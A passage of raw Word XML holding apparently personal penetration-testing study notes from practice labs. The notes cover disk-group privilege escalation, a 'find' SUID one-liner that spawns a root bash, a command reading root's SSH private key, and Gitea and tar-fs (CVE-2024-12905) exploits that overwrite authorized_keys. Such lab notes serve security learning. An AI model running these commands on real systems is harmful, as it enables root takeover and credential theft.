          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can SSH as root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—---------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1279">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">extplorer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we were in the disk group, which was highlighted in yellow by linPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="111" name="image110.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image110.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId128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39AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It can read any file, and write to files not owned by root. So they used it to read </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and they found a hashed password for root which they cracked and switched to root user using it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There is also a hacktricks on it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="673"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1281">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/interesting-groups-linux-pe#disk-group</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rv3snp8ni0o9" w:id="541"/>
      <w:bookmarkEnd w:id="541"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using string, and -h/--help and -v/--version to find information about unknown binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a binary that you don't understand and it runs with SUID or something special, then try running it with -h/--help and -v/--version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1282">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mzeeav</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we had a binary that ran with SUID and we ran --version and saw that it was a "find" binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039B9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4368800" cy="749300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1283"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="43688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39BA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we can use the find SUID GTFO bins exploit to exploit it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/fileS . -exec /bin/bash -p \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to look at unknown binaries (also seen in OSCP challenge labs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen </w:t>
      </w:r>
      <w:hyperlink r:id="rId1284">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Workaholic</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9C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8d5t3yq8lwt3" w:id="542"/>
      <w:bookmarkEnd w:id="542"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gitea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gitea 1.7.5 was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1285">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Roquefort</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. It was an unauthenticated RCE and very easy. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1286">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49383</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A more complex attack vector via Gite was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1287">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We had to look at the git logs using gitea, as well as seeing that further examination of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file reveals that the application is using a vulnerable version of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar-fs package</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is known to be affected by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-12905</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This vulnerability allows for arbitrary file write/overwrite, which can potentially lead to remote code execution. We then used this to overwrite authorized_keys of a user to include our own new public key so we can login as that user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1288">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://themcsam.github.io/posts/tarFs-PoC/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1289">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/52268</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039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9D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
